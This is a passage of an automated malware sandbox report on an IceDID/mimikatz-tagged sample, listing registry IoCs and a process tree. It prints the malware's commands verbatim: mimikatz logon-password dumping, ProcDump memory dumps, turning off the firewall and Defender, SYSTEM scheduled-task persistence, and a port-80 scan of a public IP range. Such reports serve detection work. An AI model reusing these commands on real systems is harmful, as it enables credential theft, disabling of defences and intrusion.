Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | ncnrnqz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | ncnrnqz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | ncnrnqz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | ncnrnqz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
-
Modifies registry class 14 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | ncnrnqz.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid | Process
4996 | PING.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
2524 | ncnrnqz.exe (64 identical entries)
-
Suspicious behavior: LoadsDriver 15 IoCs
pid | Process
652 | Process not Found (this same row is reported 15 times)
-
Suspicious behavior: RenamesItself 1 IoCs
pid | Process
4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
-
Suspicious use of AdjustPrivilegeToken 26 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 4576 | ncnrnqz.exe
Token: SeDebugPrivilege | 2524 | ncnrnqz.exe
Token: SeDebugPrivilege | 3016 | vfshost.exe
Token: SeDebugPrivilege | 3340 | mtlvznziz.exe
Token: SeLockMemoryPrivilege | 4168 | jrvvrz.exe
Token: SeLockMemoryPrivilege | 4168 | jrvvrz.exe
Token: SeDebugPrivilege | 2416 | mtlvznziz.exe
Token: SeDebugPrivilege | 4156 | mtlvznziz.exe
Token: SeDebugPrivilege | 2296 | mtlvznziz.exe
Token: SeDebugPrivilege | 4256 | mtlvznziz.exe
Token: SeDebugPrivilege | 3584 | mtlvznziz.exe
Token: SeDebugPrivilege | 4428 | mtlvznziz.exe
Token: SeDebugPrivilege | 3064 | mtlvznziz.exe
Token: SeDebugPrivilege | 4892 | mtlvznziz.exe
Token: SeDebugPrivilege | 1056 | mtlvznziz.exe
Token: SeDebugPrivilege | 4532 | mtlvznziz.exe
Token: SeDebugPrivilege | 3228 | mtlvznziz.exe
Token: SeDebugPrivilege | 4052 | mtlvznziz.exe
Token: SeDebugPrivilege | 2704 | mtlvznziz.exe
Token: SeDebugPrivilege | 3028 | mtlvznziz.exe
Token: SeDebugPrivilege | 4260 | mtlvznziz.exe
Token: SeDebugPrivilege | 4776 | mtlvznziz.exe
Token: SeDebugPrivilege | 4728 | mtlvznziz.exe
Token: SeDebugPrivilege | 6344 | mtlvznziz.exe
Token: SeDebugPrivilege | 3324 | mtlvznziz.exe
-
Suspicious use of SetWindowsHookEx 12 IoCs
pid | Process
4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
4576 | ncnrnqz.exe
4576 | ncnrnqz.exe
2524 | ncnrnqz.exe
2524 | ncnrnqz.exe
3792 | xohudmc.exe
2008 | yqiwma.exe
4620 | ncnrnqz.exe
4620 | ncnrnqz.exe
6356 | ncnrnqz.exe
6356 | ncnrnqz.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 4740 wrote to memory of 4784 | 4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe | 90
PID 4740 wrote to memory of 4784 | 4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe | 90
PID 4740 wrote to memory of 4784 | 4740 | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe | 90
PID 4784 wrote to memory of 4996 | 4784 | cmd.exe | 92
PID 4784 wrote to memory of 4996 | 4784 | cmd.exe | 92
PID 4784 wrote to memory of 4996 | 4784 | cmd.exe | 92
PID 4784 wrote to memory of 4576 | 4784 | cmd.exe | 104
PID 4784 wrote to memory of 4576 | 4784 | cmd.exe | 104
PID 4784 wrote to memory of 4576 | 4784 | cmd.exe | 104
PID 2524 wrote to memory of 4960 | 2524 | ncnrnqz.exe | 106
PID 2524 wrote to memory of 4960 | 2524 | ncnrnqz.exe | 106
PID 2524 wrote to memory of 4960 | 2524 | ncnrnqz.exe | 106
PID 4960 wrote to memory of 4516 | 4960 | cmd.exe | 108
PID 4960 wrote to memory of 4516 | 4960 | cmd.exe | 108
PID 4960 wrote to memory of 4516 | 4960 | cmd.exe | 108
PID 4960 wrote to memory of 4260 | 4960 | cmd.exe | 109
PID 4960 wrote to memory of 4260 | 4960 | cmd.exe | 109
PID 4960 wrote to memory of 4260 | 4960 | cmd.exe | 109
PID 4960 wrote to memory of 1004 | 4960 | cmd.exe | 110
PID 4960 wrote to memory of 1004 | 4960 | cmd.exe | 110
PID 4960 wrote to memory of 1004 | 4960 | cmd.exe | 110
PID 4960 wrote to memory of 4356 | 4960 | cmd.exe | 111
PID 4960 wrote to memory of 4356 | 4960 | cmd.exe | 111
PID 4960 wrote to memory of 4356 | 4960 | cmd.exe | 111
PID 4960 wrote to memory of 1660 | 4960 | cmd.exe | 112
PID 4960 wrote to memory of 1660 | 4960 | cmd.exe | 112
PID 4960 wrote to memory of 1660 | 4960 | cmd.exe | 112
PID 4960 wrote to memory of 1488 | 4960 | cmd.exe | 113
PID 4960 wrote to memory of 1488 | 4960 | cmd.exe | 113
PID 4960 wrote to memory of 1488 | 4960 | cmd.exe | 113
PID 2524 wrote to memory of 4740 | 2524 | ncnrnqz.exe | 114
PID 2524 wrote to memory of 4740 | 2524 | ncnrnqz.exe | 114
PID 2524 wrote to memory of 4740 | 2524 | ncnrnqz.exe | 114
PID 2524 wrote to memory of 4052 | 2524 | ncnrnqz.exe | 116
PID 2524 wrote to memory of 4052 | 2524 | ncnrnqz.exe | 116
PID 2524 wrote to memory of 4052 | 2524 | ncnrnqz.exe | 116
PID 2524 wrote to memory of 1140 | 2524 | ncnrnqz.exe | 118
PID 2524 wrote to memory of 1140 | 2524 | ncnrnqz.exe | 118
PID 2524 wrote to memory of 1140 | 2524 | ncnrnqz.exe | 118
PID 2524 wrote to memory of 1084 | 2524 | ncnrnqz.exe | 124
PID 2524 wrote to memory of 1084 | 2524 | ncnrnqz.exe | 124
PID 2524 wrote to memory of 1084 | 2524 | ncnrnqz.exe | 124
PID 1084 wrote to memory of 3016 | 1084 | cmd.exe | 126
PID 1084 wrote to memory of 3016 | 1084 | cmd.exe | 126
PID 1084 wrote to memory of 3016 | 1084 | cmd.exe | 126
PID 3016 wrote to memory of 4020 | 3016 | wpcap.exe | 127
PID 3016 wrote to memory of 4020 | 3016 | wpcap.exe | 127
PID 3016 wrote to memory of 4020 | 3016 | wpcap.exe | 127
PID 4020 wrote to memory of 5028 | 4020 | net.exe | 129
PID 4020 wrote to memory of 5028 | 4020 | net.exe | 129
PID 4020 wrote to memory of 5028 | 4020 | net.exe | 129
PID 3016 wrote to memory of 840 | 3016 | wpcap.exe | 130
PID 3016 wrote to memory of 840 | 3016 | wpcap.exe | 130
PID 3016 wrote to memory of 840 | 3016 | wpcap.exe | 130
PID 840 wrote to memory of 4704 | 840 | net.exe | 132
PID 840 wrote to memory of 4704 | 840 | net.exe | 132
PID 840 wrote to memory of 4704 | 840 | net.exe | 132
PID 3016 wrote to memory of 4324 | 3016 | wpcap.exe | 133
PID 3016 wrote to memory of 4324 | 3016 | wpcap.exe | 133
PID 3016 wrote to memory of 4324 | 3016 | wpcap.exe | 133
PID 4324 wrote to memory of 2968 | 4324 | net.exe | 135
PID 4324 wrote to memory of 2968 | 4324 | net.exe | 135
PID 4324 wrote to memory of 2968 | 4324 | net.exe | 135
PID 3016 wrote to memory of 1416 | 3016 | wpcap.exe | 136
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2140
-
C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe"C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kvialcmr\ncnrnqz.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4996
-
-
C:\Windows\kvialcmr\ncnrnqz.exeC:\Windows\kvialcmr\ncnrnqz.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4576
-
-
-
C:\Windows\kvialcmr\ncnrnqz.exeC:\Windows\kvialcmr\ncnrnqz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4516
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1004
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1660
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1488
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4740
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:4052
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:1140
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exeC:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:5028
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4704
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2968
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3980
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4776
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1816
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4940
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2572
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4128
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ctvlnlili\rzvrtrlue\Scant.txt2⤵PID:4348
-
C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exeC:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ctvlnlili\rzvrtrlue\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ctvlnlili\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ctvlnlili\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:2416 -
C:\Windows\ctvlnlili\Corporate\vfshost.exeC:\Windows\ctvlnlili\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "sviaigimi" /ru system /tr "cmd /c C:\Windows\ime\ncnrnqz.exe"2⤵PID:4520
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "sviaigimi" /ru system /tr "cmd /c C:\Windows\ime\ncnrnqz.exe"3⤵
- Creates scheduled task(s)
PID:3040
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lcerrlzzb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F"2⤵PID:664
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lcerrlzzb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kvialcmr\ncnrnqz.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "krzieamit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F"2⤵PID:3472
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "krzieamit" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\pmrlgkemu\jrvvrz.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:4456
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:1080
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:3204
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:1984
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4740
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:3292
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:3260
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4312
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:1552
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3284
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3592
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2608
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:424
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:4324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:4752
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:840
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4364
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4128
-
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 792 C:\Windows\TEMP\ctvlnlili\792.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:4300
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:1884
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2340
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4648
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:1488
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4272
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4784
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2808
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:4456
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:1660
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2196
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:2160
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1924
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:3792
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 332 C:\Windows\TEMP\ctvlnlili\332.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2140 C:\Windows\TEMP\ctvlnlili\2140.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4156
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2552 C:\Windows\TEMP\ctvlnlili\2552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2664 C:\Windows\TEMP\ctvlnlili\2664.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 2828 C:\Windows\TEMP\ctvlnlili\2828.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3584
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3144 C:\Windows\TEMP\ctvlnlili\3144.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3872 C:\Windows\TEMP\ctvlnlili\3872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 3956 C:\Windows\TEMP\ctvlnlili\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4892
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 4028 C:\Windows\TEMP\ctvlnlili\4028.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 648 C:\Windows\TEMP\ctvlnlili\648.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 5012 C:\Windows\TEMP\ctvlnlili\5012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Windows\TEMP\ctvlnlili\mtlvznziz.exeC:\Windows\TEMP\ctvlnlili\mtlvznziz.exe -accepteula -mp 1652 C:\Windows\TEMP\ctvlnlili\1652.dmp2⤵
- Executes dropped EXE
